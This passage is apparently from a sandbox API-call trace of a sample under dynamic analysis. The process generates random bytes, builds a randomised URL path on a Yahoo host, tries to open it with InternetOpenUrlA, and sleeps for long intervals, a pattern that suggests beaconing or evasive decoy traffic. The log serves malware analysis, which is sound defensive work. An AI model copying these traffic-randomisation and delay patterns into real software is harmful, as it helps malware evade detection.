returned 0x7ffc5bcc36b0 [0211.868] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0211.868] GetProcessHeap () returned 0x440000 [0211.868] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0211.868] lstrcpyA (in: lpString1=0x4741c0, lpString2="êê=\x88s://www.yahoo.com" | out: lpString1="êê=\x88s://www.yahoo.com") returned="êê=\x88s://www.yahoo.com" [0211.868] lstrcatA (in: lpString1="êê=\x88s://www.yahoo.com", lpString2="/mlx2SocTl41j4EW7YwxssmI/8pzzoCidjuwe6c7ass5kfuZK03khncu/x7S43K70sdP09mMxpn/" | out: lpString1="êê=\x88s://www.yahoo.com/mlx2SocTl41j4EW7YwxssmI/8pzzoCidjuwe6c7ass5kfuZK03khncu/x7S43K70sdP09mMxpn/") returned="êê=\x88s://www.yahoo.com/mlx2SocTl41j4EW7YwxssmI/8pzzoCidjuwe6c7ass5kfuZK03khncu/x7S43K70sdP09mMxpn/" [0211.868] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0211.868] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="êê=\x88s://www.yahoo.com/mlx2SocTl41j4EW7YwxssmI/8pzzoCidjuwe6c7ass5kfuZK03khncu/x7S43K70sdP09mMxpn/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0211.868] GetProcessHeap () returned 0x440000 [0211.868] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0211.868] GetProcessHeap () returned 0x440000 [0211.868] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17200 | out: hHeap=0x440000) returned 1 [0211.869] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0211.869] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0211.869] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0211.869] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0211.869] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0211.869] Sleep (dwMilliseconds=0x19fb0) [0212.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0212.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0212.392] GetProcessHeap () returned 0x440000 [0212.392] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d6570 [0212.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0212.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6571, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4d6571) returned 0x0 [0212.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0212.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.757] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.758] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.759] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0212.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d6595, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x4d6595) returned 0x0 [0212.760] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.760] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.762] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0212.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d65aa, cbBuffer=0x2e, dwFlags=0x2 | out: pbBuffer=0x4d65aa) returned 0x0 [0212.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0212.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0212.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0212.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0212.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0212.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d65d8, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x4d65d8) returned 0x0 [0212.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0212.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0212.771] BCryptGenRandom (in: hAlgorithm=0x0, 